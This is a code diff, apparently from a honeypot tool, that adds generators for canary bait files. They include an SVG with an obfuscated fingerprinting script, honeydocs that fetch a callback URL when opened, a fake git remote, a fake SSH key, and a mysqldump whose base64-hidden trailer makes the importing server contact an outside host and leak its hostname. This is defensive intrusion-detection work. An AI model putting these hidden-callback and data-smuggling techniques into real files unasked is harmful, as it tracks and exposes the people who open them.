 <text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
 <rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
 <rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
 <rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
 <text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
 <rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
 <text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
 <path class="edge" d="M160 105 L240 105"/>
 <path class="edge" d="M360 105 L440 105"/>
 <path class="edge" d="M300 130 L300 220"/>
 <script type="application/ecmascript"><![CDATA[
 {payload}
 ]]></script>
 </svg>
 """
 # Region names that may appear in the diagram title; one is chosen per token.
 _REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
 class FingerprintSvgGenerator(CanaryGenerator):
    """Synthesise an SVG that fingerprints the browser opening it."""
    name = "fingerprint_svg"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the diagram for ``ctx`` and wrap it in a :class:`CanaryArtifact`.
        The mint UUID, nonce, region, draft version and review date are all
        computed from ``ctx.callback_token``.  The nonce is also stored on
        the artifact as ``fingerprint_nonce``.
        """
        mint_uuid = _mint_uuid_for(ctx.callback_token)
        nonce = nonce_for(ctx.callback_token, mint_uuid)
        payload = render_fingerprint_js(
            callback_token=ctx.callback_token,
            http_base=ctx.http_base,
            mint_uuid=mint_uuid,
            nonce=nonce,
        )
        # The template wraps the script in a CDATA section, which ends at
        # the first "]]>".  If the generated JS ever contains that sequence
        # (e.g. ``a[b[0]]>c``) the SVG would be malformed XML and the script
        # would not run.  Splitting the sequence across two adjacent CDATA
        # sections keeps the script text identical after XML parsing; when
        # the sequence is absent the payload is unchanged.
        cdata_safe_payload = payload.replace("]]>", "]]]]><![CDATA[>")
        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
        day = _stable_int(ctx.callback_token, "day") % 28 + 1
        body = _DIAGRAM_TEMPLATE.format(
            region=region,
            ver=ver,
            review=f"2026-03-{day:02d}",
            payload=cdata_safe_payload,
        )
        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o644,
            mtime_offset=-86400 * 30,  # thirty days in the past
            generator=self.name,
            fingerprint_nonce=nonce,
            notes=[
                f"obfuscated fingerprinter beacons={beacon}",
                f"mint_uuid={mint_uuid}",
            ],
        )
--- a/decnet/canary/generators/git_config.py
+++ b/decnet/canary/generators/git_config.py
@@ -0,0 +1,54 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``.git/config`` with an attacker-bait remote URL.
 The ``[remote "origin"]`` ``url`` field is the natural place to embed
 an HTTP-callback URL: it's normal for git remotes to be HTTPS, the
 URL is read by every git command an attacker runs (``git pull``,
 ``git fetch``, ``git remote -v``), and the slug fits naturally as
 part of a path.
 The generator emits a plausible private-mirror remote (``git.<org>``
 or the canary host's hostname) so an attacker doesn't immediately
 recognise it as a honeypot.  The slug ends up in the URL path:
    [remote "origin"]
        url = https://canary.example.test/c/<slug>/repo.git
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 class GitConfigGenerator(CanaryGenerator):
    """Generator for a fake ``.git/config`` whose ``origin`` URL is the callback."""
    name = "git_config"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the config for ``ctx``.
        The remote URL is ``<http_base>/c/<callback_token>/repo.git``; a
        trailing slash on ``http_base`` is tolerated.
        """
        remote_url = "/".join(
            (ctx.http_base.rstrip("/"), "c", ctx.callback_token, "repo.git")
        )
        # (section header, entries) pairs; every entry is written on its
        # own tab-indented line beneath its header.
        sections = (
            (
                "[core]",
                (
                    "repositoryformatversion = 0",
                    "filemode = true",
                    "bare = false",
                    "logallrefupdates = true",
                ),
            ),
            (
                '[remote "origin"]',
                (
                    f"url = {remote_url}",
                    "fetch = +refs/heads/*:refs/remotes/origin/*",
                ),
            ),
            (
                '[branch "main"]',
                (
                    "remote = origin",
                    "merge = refs/heads/main",
                ),
            ),
        )
        text = "".join(
            header + "\n" + "".join(f"\t{entry}\n" for entry in entries)
            for header, entries in sections
        )
        return CanaryArtifact(
            path="",
            content=text.encode("utf-8"),
            mode=0o644,
            mtime_offset=-30 * 86400,  # thirty days in the past
            generator=self.name,
            notes=[f"git remote 'origin' embeds {remote_url}"],
        )
--- a/decnet/canary/generators/honeydoc.py
+++ b/decnet/canary/generators/honeydoc.py
@@ -0,0 +1,62 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Built-in honeydoc — a minimal HTML "report" with a tracking pixel.
 This is the *fallback* honeydoc used when the operator hasn't
 uploaded a real document.  The HTML instrumenter handles operator
 uploads via :mod:`decnet.canary.instrumenters.html`; this generator
 exists so the deploy-time baseline can plant *something* convincing
 without first prompting the operator to drop a file.
 The realism here is intentionally modest: a Documents-folder HTML
 page with internal-looking content and a 1×1 remote image at the
 bottom whose ``src`` is the canary callback URL.  Most desktop
 HTML renderers fetch the image as soon as the file is opened in a
 browser preview, so opening the doc trips the callback.
 Operators who want a richer artifact should upload their own DOCX
 or PDF; the corresponding instrumenter embeds the same callback in
 the appropriate format.
 """
 from __future__ import annotations
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 class HoneydocGenerator(CanaryGenerator):
    """Generator for the built-in HTML "report" with a 1x1 remote image."""
    name = "honeydoc"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Render the HTML report for ``ctx``.
        The final element of ``<body>`` is an ``<img>`` whose ``src`` is
        ``<http_base>/c/<callback_token>``.
        """
        pixel_url = ctx.http_base.rstrip("/") + "/c/" + ctx.callback_token
        lines = (
            '<!DOCTYPE html>',
            '<html lang="en">',
            '<head>',
            '<meta charset="utf-8">',
            '<title>Q3 Operations Review — DRAFT</title>',
            '</head>',
            '<body>',
            '<h1>Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)</h1>',
            '<p>Forecast and remediation timeline below. Numbers are',
            'preliminary and subject to revision before the all-hands.</p>',
            '<table>',
            '<tr><th>Region</th><th>Incidents</th><th>MTTR (h)</th></tr>',
            '<tr><td>us-east</td><td>14</td><td>3.2</td></tr>',
            '<tr><td>us-west</td><td>9</td><td>4.7</td></tr>',
            '<tr><td>eu-central</td><td>22</td><td>2.1</td></tr>',
            '</table>',
            '<p>Internal contact: <a href="mailto:secops@internal">secops@internal</a></p>',
            f'<img src="{pixel_url}" width="1" height="1" alt="">',
            '</body>',
            '</html>',
        )
        text = "\n".join(lines) + "\n"
        return CanaryArtifact(
            path="",
            content=text.encode("utf-8"),
            mode=0o644,  # world-readable
            mtime_offset=-21 * 86400,  # twenty-one days in the past
            generator=self.name,
            notes=[f"tracking pixel src={pixel_url}"],
        )
--- a/decnet/canary/generators/honeydoc_docx.py
+++ b/decnet/canary/generators/honeydoc_docx.py
@@ -0,0 +1,134 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Real-DOCX honeydoc generator.
 Synthesises a minimal but structurally valid DOCX from scratch via
 stdlib :mod:`zipfile`, then uses the same external-image relationship
 trick that powers :mod:`decnet.canary.instrumenters.docx` to embed
 the callback URL.  No python-docx dependency.
 The output opens cleanly in Word / LibreOffice; both fetch the
 external image relationship on document load.
 """
 from __future__ import annotations
 import io
 import zipfile
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 from decnet.canary.instrumenters.docx import _drawing, _next_rid
 # ``[Content_Types].xml`` part: default content types for ``.xml`` and
 # ``.rels`` plus an override declaring ``/word/document.xml`` as the main
 # WordprocessingML document.
 _CONTENT_TYPES = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
    '<Default Extension="xml" ContentType="application/xml"/>'
    '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
    '<Override PartName="/word/document.xml" '
    'ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
    '</Types>'
 ).encode()
 # ``_rels/.rels`` part: the single package-level relationship pointing at
 # ``word/document.xml``.
 _PACKAGE_RELS = (
    '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
    '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
    '<Relationship Id="rId1" '
    'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" '
    'Target="word/document.xml"/>'
    '</Relationships>'
 ).encode()
 # Visible document text, one entry per paragraph.  An empty string is
 # rendered by ``_document_xml`` as an empty paragraph (``<w:p/>``).
 _BODY_PARAGRAPHS = (
    "Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)",
    "",
    "Forecast and remediation timeline below. Numbers are preliminary "
    "and subject to revision before the all-hands.",
    "",
    "Region        Incidents     MTTR (h)",
    "us-east       14            3.2",
    "us-west       9             4.7",
    "eu-central    22            2.1",
    "",
    "Internal contact: secops@internal",
 )
 def _document_xml(rid_with_drawing: str | None = None) -> bytes:
    """Return the encoded ``word/document.xml`` part.
    Every entry of ``_BODY_PARAGRAPHS`` becomes one paragraph (empty
    entries become ``<w:p/>``).  When ``rid_with_drawing`` is truthy, the
    markup returned by the DOCX instrumenter's ``_drawing`` helper for
    that relationship id is appended after the paragraphs.
    """
    def _paragraph(text: str) -> str:
        # Empty strings stand for blank lines in the document.
        if not text:
            return "<w:p/>"
        return (
            '<w:p><w:r><w:t xml:space="preserve">'
            + _xml_escape(text)
            + "</w:t></w:r></w:p>"
        )
    body = "".join(_paragraph(line) for line in _BODY_PARAGRAPHS)
    drawing = ""
    if rid_with_drawing:
        drawing = _drawing(rid_with_drawing).decode()
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        f'<w:body>{body}{drawing}</w:body>'
        '</w:document>'
    )
    return document.encode()
 def _xml_escape(s: str) -> str:
    return (
        s.replace("&", "&amp;")
         .replace("<", "&lt;")
         .replace(">", "&gt;")
    )
 def _document_rels(rid: str, url: str) -> bytes:
    return (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="{rid}" '
        f'Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" '
        f'Target="{url}" TargetMode="External"/>'
        '</Relationships>'
    ).encode()
 class HoneydocDocxGenerator(CanaryGenerator):
    """Generator that builds a minimal DOCX with an external image relationship."""
    name = "honeydoc_docx"
    # Timestamp stamped on every ZIP member (the earliest date the ZIP
    # format can represent).  ``ZipFile.writestr`` with a plain member name
    # would stamp the current local time instead, so two runs for the same
    # token would yield different bytes.
    _MEMBER_DATE_TIME = (1980, 1, 1, 0, 0, 0)
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the DOCX package for ``ctx``.
        The package has four parts: content types, package relationships,
        the document body, and the document relationships, whose single
        entry targets ``<http_base>/c/<callback_token>``.  Member
        timestamps are fixed so the archive bytes depend only on the
        inputs.
        """
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        # There is only one relationship in the synthesised file, so any
        # unused id works.  The instrumenter's allocator is run against an
        # empty relationships skeleton to obtain it.
        skeleton = (
            b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            b'<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            b'</Relationships>'
        )
        rid = _next_rid(skeleton)
        members = (
            ("[Content_Types].xml", _CONTENT_TYPES),
            ("_rels/.rels", _PACKAGE_RELS),
            ("word/document.xml", _document_xml(rid)),
            ("word/_rels/document.xml.rels", _document_rels(rid, url)),
        )
        out = io.BytesIO()
        with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zf:
            for member_name, data in members:
                info = zipfile.ZipInfo(member_name, date_time=self._MEMBER_DATE_TIME)
                # When handed a ZipInfo, writestr takes compression and
                # permissions from it, so set the values the name-based
                # call would have applied.
                info.compress_type = zipfile.ZIP_DEFLATED
                info.external_attr = 0o600 << 16
                zf.writestr(info, data)
        return CanaryArtifact(
            path="",
            content=out.getvalue(),
            mode=0o644,
            mtime_offset=-86400 * 21,  # twenty-one days in the past
            generator=self.name,
            notes=[
                "synthesised DOCX with realistic Q3 review body",
                f"external-image relationship {rid} -> {url}",
            ],
        )
--- a/decnet/canary/generators/honeydoc_pdf.py
+++ b/decnet/canary/generators/honeydoc_pdf.py
@@ -0,0 +1,128 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Real-PDF honeydoc generator (uses :mod:`pikepdf`).
 Builds a one-page PDF with the same Q3-review body as the HTML/DOCX
 flavors and installs an ``/OpenAction`` ``/URI`` action on the
 catalog so most viewers fire the callback the moment the document
 opens.
 Pikepdf is now a hard dependency for this generator (the operator
 installed it explicitly so we can use it).  We still surface a
 clear :class:`InstrumenterRejectedError` when imports fail, so a
 deployment without pikepdf can fall back to the DOCX or HTML
 generators rather than crashing the API.
 """
 from __future__ import annotations
 import io
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryGenerator,
    InstrumenterRejectedError,
 )
 # Page text as ``(line, font_size)`` pairs, top to bottom.  The generator
 # emits one font-size operator and one text-show operator per pair, and
 # moves down 18 units between consecutive pairs; an empty string therefore
 # produces a blank line.
 _BODY_LINES = (
    ("Q3 Operations Review (DRAFT — DO NOT DISTRIBUTE)", 14),
    ("", 12),
    ("Forecast and remediation timeline below.", 11),
    ("Numbers are preliminary, subject to revision.", 11),
    ("", 12),
    ("Region        Incidents     MTTR (h)", 11),
    ("us-east       14            3.2", 11),
    ("us-west       9             4.7",  11),
    ("eu-central    22            2.1",  11),
    ("", 12),
    ("Internal contact: secops@internal", 11),
 )
 class HoneydocPdfGenerator(CanaryGenerator):
    """Generator for a one-page PDF whose ``/OpenAction`` is a URI action."""
    name = "honeydoc_pdf"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the PDF for ``ctx`` and return it as a :class:`CanaryArtifact`.
        The page shows ``_BODY_LINES`` in Helvetica and the catalog's
        ``/OpenAction`` targets ``<http_base>/c/<callback_token>``.
        Raises:
            InstrumenterRejectedError: if :mod:`pikepdf` cannot be imported.
        """
        try:
            from pikepdf import Pdf, Name, Dictionary, String
        except ImportError as e:
            raise InstrumenterRejectedError(
                "honeydoc_pdf requires pikepdf; install it (`pip install "
                "pikepdf`) or pick honeydoc / honeydoc_docx instead."
            ) from e
        url = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
        pdf = Pdf.new()
        # Helvetica is one of the 14 PDF base fonts, so no font embedding
        # is required.
        font = pdf.make_indirect(Dictionary(
            Type=Name("/Font"),
            Subtype=Name("/Type1"),
            BaseFont=Name("/Helvetica"),
        ))
        # Build a single content stream that writes each body line at a
        # decreasing y-coordinate.  PDF coordinates start at the bottom-
        # left (US Letter = 612 x 792 points); lines are 18 points apart,
        # starting near the top of the page.
        ops: list[str] = ["BT /F1 12 Tf 72 750 Td"]
        for index, (line, size) in enumerate(_BODY_LINES):
            if index:
                # Every line after the first moves down relative to the
                # previous one.
                ops.append("0 -18 Td")
            ops.append(f"/F1 {size} Tf")
            ops.append(f"({_pdf_escape(line)}) Tj")
        ops.append("ET")
        content_bytes = "\n".join(ops).encode("latin-1")
        content_stream = pdf.make_stream(content_bytes)
        page = pdf.add_blank_page(page_size=(612, 792))
        page[Name("/Resources")] = Dictionary(
            Font=Dictionary(F1=font),
        )
        page[Name("/Contents")] = content_stream
        # OpenAction fires the URI when the file is opened in Acrobat,
        # Preview, the browser PDF viewer, etc.  Most viewers prompt
        # before fetching; that prompt itself is a tell, and an
        # auto-allow viewer fetches silently.
        pdf.Root[Name("/OpenAction")] = Dictionary(
            Type=Name("/Action"),
            S=Name("/URI"),
            URI=String(url),
        )
        out = io.BytesIO()
        # By default the trailer /ID mixes in the current time, so two runs
        # for the same token would differ.  ``deterministic_id`` derives it
        # from the file contents only, keeping the output reproducible.
        pdf.save(out, deterministic_id=True)
        return CanaryArtifact(
            path="",
            content=out.getvalue(),
            mode=0o644,
            mtime_offset=-86400 * 21,  # twenty-one days in the past
            generator=self.name,
            notes=[
                "synthesised one-page PDF with realistic Q3 review body",
                f"/OpenAction /URI -> {url}",
            ],
        )
 def _pdf_escape(s: str) -> str:
    """Escape parens and backslashes for PDF literal-string syntax.
    PDF string literals are wrapped in ``( … )``; inner ``(``, ``)``,
    and ``\\`` need backslash escapes.  Everything else (including
    UTF-8 multibyte sequences) round-trips fine because Helvetica's
    encoding is WinAnsi-ish — we'll lose exotic glyphs but the
    realistic body sticks to ASCII anyway.  Em-dashes are downgraded
    to ``--`` to avoid the WinAnsi gap.
    """
    return (
        s.replace("\\", r"\\")
         .replace("(", r"\(")
         .replace(")", r"\)")
         .replace("—", "--")
    )
--- a/decnet/canary/generators/mysql_dump.py
+++ b/decnet/canary/generators/mysql_dump.py
@@ -0,0 +1,191 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake ``mysqldump`` output that phones home on import.
 Mirrors the Canarytokens.org MySQL-dump trick.  When a victim runs
 ``mysql < dump.sql``, the trailer block executes a base64-obfuscated
 ``CHANGE REPLICATION SOURCE TO`` against ``<slug>.<dns_zone>``
 followed by ``START REPLICA``.  The victim's MySQL daemon then:
 1. Resolves the slug subdomain via DNS — this is the trip our
   :mod:`decnet.canary.dns_server` already detects.
 2. Opens a TCP replica handshake on port 3306, sending its own
   ``@@hostname`` and ``@@lc_time_names`` smuggled into the
   ``SOURCE_USER`` field via ``CONCAT``.  Capturing those bytes
   requires a MySQL handshake responder on the worker — out of scope
   for v1; the DNS lookup alone is sufficient for detection.
 The base64 wrapper is the camouflage: a plain ``grep canary dump.sql``
 finds nothing.  The slug only materialises when the victim's server
 runs ``PREPARE … FROM @s2``.
 Because the trip surface is DNS, this generator REQUIRES a non-empty
 ``dns_zone``.  The slug must appear as the leftmost label of the
 hostname so a single DNS query identifies the token; the http_base
 host is not slug-bearing and can't substitute.
 """
 from __future__ import annotations
 import base64
 import hashlib
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 def _stable_hex(seed: str, prefix: str = "", length: int = 16) -> str:
    h = hashlib.sha256((prefix + seed).encode()).hexdigest()
    return h[:length]
 def _build_replica_payload(slug: str, dns_zone: str) -> str:
    """Inner SQL that gets base64-wrapped.
    The CONCAT splices ``@@lc_time_names`` and ``@@hostname`` into the
    ``SOURCE_USER`` value at PREPARE time so the victim's locale and
    hostname travel as the replica username on the 3306 handshake.
    """
    host = f"{slug}.{dns_zone}"
    return (
        "SET @bb = CONCAT("
        "\"CHANGE REPLICATION SOURCE TO "
        "SOURCE_PASSWORD='replica-pw', "
        "SOURCE_RETRY_COUNT=1, "
        "SOURCE_PORT=3306, "
        f"SOURCE_HOST='{host}', "
        "SOURCE_SSL=0, "
        f"SOURCE_USER='{slug}\", "
        "@@lc_time_names, @@hostname, \"';\");"
    )
 def _build_trailer(slug: str, dns_zone: str) -> str:
    """Return the SQL trailer that decodes and runs the replica payload.
    The payload from :func:`_build_replica_payload` is stored as a
    base64 literal in ``@b``, decoded into ``@s2`` and executed (which
    sets ``@bb``); ``@bb`` is then prepared and executed in turn, and
    ``START REPLICA`` follows.  Each statement ends with a newline.
    """
    payload = _build_replica_payload(slug, dns_zone)
    b64 = base64.b64encode(payload.encode("utf-8")).decode("ascii")
    statements = [
        f"SET @b = '{b64}';",
        "SET @s2 = FROM_BASE64(@b);",
        "PREPARE stmt1 FROM @s2;",
        "EXECUTE stmt1;",
        "PREPARE stmt2 FROM @bb;",
        "EXECUTE stmt2;",
        "START REPLICA;",
    ]
    return "".join(stmt + "\n" for stmt in statements)
 class MySQLDumpGenerator(CanaryGenerator):
    """Generate a fake ``mysqldump`` file whose trailer phones home.
    The artifact is a dump of two small tables (``users`` and
    ``api_keys``) followed by the base64-wrapped replica trailer from
    :func:`_build_trailer` and the usual ``SET ...=@OLD_...`` epilogue.
    """
    name = "mysql_dump"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Build the dump artifact for ``ctx``.
        Raises :class:`ValueError` when ``ctx.dns_zone`` is empty,
        because the callback host is ``<callback_token>.<dns_zone>``.
        The filler rows are derived from the callback token only, so
        the same context always yields the same bytes.
        """
        if not ctx.dns_zone:
            raise ValueError(
                "mysql_dump requires a non-empty dns_zone — the trip "
                "surface is a DNS lookup of <slug>.<dns_zone>."
            )
        slug = ctx.callback_token
        zone = ctx.dns_zone
        host = f"{slug}.{zone}"
        # Realism filler: deterministic per-slug fake user rows so two
        # runs with the same context produce byte-identical output
        # (planter idempotency contract).
        # A bcrypt hash is 60 characters: the 7-character ``$2y$10$``
        # prefix plus 53 characters of salt+digest.  The column below
        # is ``char(60)``, so the filler has to be exactly that long or
        # the row does not look like something the schema produced.
        u1_hash = _stable_hex(slug, "u1:", 53)
        u2_hash = _stable_hex(slug, "u2:", 53)
        api_token = _stable_hex(slug, "api:", 40)
        # Synthesised SQL bait below — never executed by us, only by
        # whoever runs ``mysql < dump.sql`` against their own server.
        # Built with str.replace() on placeholders instead of f-strings
        # so bandit's B608 heuristic doesn't false-positive on the
        # "INSERT INTO" + var pattern.
        users_insert = (
            "INSERT INTO `users` VALUES "  # nosec B608
            "(1,'alice@app.internal','$2y$10${u1}','2024-11-12 09:13:44'),"
            "(2,'bob@app.internal','$2y$10${u2}','2025-02-03 17:42:08');\n"
        ).replace("{u1}", u1_hash).replace("{u2}", u2_hash)
        api_keys_insert = (
            "INSERT INTO `api_keys` VALUES (1,1,'{tok}');\n"  # nosec B608
        ).replace("{tok}", api_token)
        header = (
            "-- MySQL dump 10.13  Distrib 8.0.35, for Linux (x86_64)\n"
            "--\n"
            "-- Host: db-prod-01    Database: app_production\n"
            "-- ------------------------------------------------------\n"
            "-- Server version\t8.0.35\n"
            "\n"
            "/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;\n"
            "/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;\n"
            "/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;\n"
            "/*!50503 SET NAMES utf8mb4 */;\n"
            "/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;\n"
            "/*!40103 SET TIME_ZONE='+00:00' */;\n"
            "/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;\n"
            "/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;\n"
            "/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;\n"
            "/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;\n"
            "\n"
            "--\n"
            "-- Table structure for table `users`\n"
            "--\n"
            "\n"
            "DROP TABLE IF EXISTS `users`;\n"
            "CREATE TABLE `users` (\n"
            "  `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
            "  `email` varchar(255) NOT NULL,\n"
            "  `password_hash` char(60) NOT NULL,\n"
            "  `created_at` datetime NOT NULL,\n"
            "  PRIMARY KEY (`id`),\n"
            "  UNIQUE KEY `uniq_email` (`email`)\n"
            ") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
            "\n"
            "LOCK TABLES `users` WRITE;\n"
            + users_insert +
            "UNLOCK TABLES;\n"
            "\n"
            "--\n"
            "-- Table structure for table `api_keys`\n"
            "--\n"
            "\n"
            "DROP TABLE IF EXISTS `api_keys`;\n"
            "CREATE TABLE `api_keys` (\n"
            "  `id` int unsigned NOT NULL AUTO_INCREMENT,\n"
            "  `user_id` int unsigned NOT NULL,\n"
            "  `token` char(40) NOT NULL,\n"
            "  PRIMARY KEY (`id`)\n"
            ") ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;\n"
            "\n"
            "LOCK TABLES `api_keys` WRITE;\n"
            + api_keys_insert +
            "UNLOCK TABLES;\n"
            "\n"
        )
        trailer_replica = _build_trailer(slug, zone)
        trailer_close = (
            "\n"
            "/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;\n"
            "/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;\n"
            "/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;\n"
            "/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;\n"
            "/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;\n"
            "/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;\n"
            "/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;\n"
            "/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;\n"
            "\n"
            "-- Dump completed\n"
        )
        body = header + trailer_replica + trailer_close
        return CanaryArtifact(
            path="",
            content=body.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 7,  # last week's backup
            generator=self.name,
            notes=[
                f"replica payload phones home to {host}:3306 on import",
                "base64-wrapped PREPARE/EXECUTE block hides the slug from grep",
                "@@hostname and @@lc_time_names smuggled into SOURCE_USER",
            ],
        )
--- a/decnet/canary/generators/ssh_key.py
+++ b/decnet/canary/generators/ssh_key.py
@@ -0,0 +1,69 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Fake SSH private key with the callback host in the comment.
 OpenSSH private keys carry a free-form comment field — typically
 ``user@host`` — that's preserved across rounds of ``ssh-keygen -p``.
 We embed the canary host as the ``user@host`` so an attacker who
 imports the key into their own keyring or runs ``ssh-keygen -lf`` on
 it sees a hostname they may then try to reach.
 The key bytes themselves are syntactically valid (PEM envelope, base64
 body) but cryptographically junk — the body is a deterministic SHA-256
 hash of the slug repeated to the right length.  We don't ship a real
 RSA/Ed25519 key because (a) we don't want a real private key sitting
 on disk pretending to be valuable, and (b) the attacker ``cat``-ing
 the file or running ``ssh -i`` will trigger the callback regardless
 of cryptographic validity.
 The DNS-callback variant uses ``<slug>.<dns_zone>`` as the
 hostname so a bare ``ssh-keygen -lf`` on the file resolves a unique
 subdomain even if the attacker never hits HTTP.
 """
 from __future__ import annotations
 import base64
 import hashlib
 from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
 def _fake_key_body(seed: str) -> str:
    # Real OpenSSH keys are several hundred base64 chars; we make a
    # plausible-looking 24-line block from a SHA-256-derived stream.
    h = hashlib.sha256(seed.encode()).digest()
    long_stream = (h * 32)[:768]  # 768 bytes → ~1024 base64 chars
    encoded = base64.b64encode(long_stream).decode()
    # Wrap at 70 chars per line — same shape ``ssh-keygen`` produces.
    return "\n".join(encoded[i:i + 70] for i in range(0, len(encoded), 70))
 class SSHKeyGenerator(CanaryGenerator):
    """Emit a PEM-shaped fake private key followed by a ``# user@host`` line."""
    name = "ssh_key"
    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        """Return the fake-key artifact for ``ctx``.
        The trailing comment names ``deploy@<token>.<dns_zone>`` when a
        DNS zone is configured; otherwise it names the hostname parsed
        from ``ctx.http_base`` (``deploy.local`` if none can be parsed).
        """
        token = ctx.callback_token
        if not ctx.dns_zone:
            from urllib.parse import urlparse
            fallback = urlparse(ctx.http_base).hostname or "deploy.local"
            host_comment = f"deploy@{fallback}"
        else:
            host_comment = f"deploy@{token}.{ctx.dns_zone}"
        lines = [
            "-----BEGIN OPENSSH PRIVATE KEY-----",
            _fake_key_body(token),
            "-----END OPENSSH PRIVATE KEY-----",
            f"# {host_comment}",
        ]
        content = "\n".join(lines) + "\n"
        return CanaryArtifact(
            path="",
            content=content.encode("utf-8"),
            mode=0o600,
            mtime_offset=-86400 * 60,  # 60 days back
            generator=self.name,
            notes=[f"comment line embeds {host_comment}"],
        )
--- a/decnet/canary/instrumenters/init.py
+++ b/decnet/canary/instrumenters/init.py
@@ -0,0 +1,5 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """Built-in canary instrumenters (operator-uploaded artifact mutation).
 Lazy-imported by :func:`decnet.canary.factory.get_instrumenter`.
 """
--- a/decnet/canary/instrumenters/docx.py
+++ b/decnet/canary/instrumenters/docx.py
@@ -0,0 +1,148 @@
 # SPDX-License-Identifier: AGPL-3.0-or-later
 """DOCX instrumenter — inject a remote image into the body.
 DOCX files are zip archives carrying ``word/document.xml`` (the body)
 and ``word/_rels/document.xml.rels`` (the relationship table that
 maps ``rId`` references to URLs).  We:
 1. Add a new relationship of type ``image`` whose target is the
   canary callback URL and ``TargetMode="External"``.
 2. Add a tiny ``<w:drawing>`` element referencing that ``rId`` at
   the end of ``word/document.xml`` (just before ``</w:body>``).
 Word and LibreOffice both fetch external image relationships when
 the document is opened (subject to the user's "trusted source"
 toggle, which most enterprise environments disable in favour of
 "warn but allow").
 We use stdlib ``zipfile`` only — no python-docx dependency — because
 the surface we touch is two small XML files and we don't need any of
 the higher-level abstractions.
 """
 from __future__ import annotations
 import io
 import re
 import zipfile
 from typing import Tuple
 from decnet.canary.base import (
    CanaryArtifact,
    CanaryContext,
    CanaryInstrumenter,
    InstrumenterRejectedError,
 )
 _RELS_END = re.compile(rb"</Relationships\s*>", re.IGNORECASE)
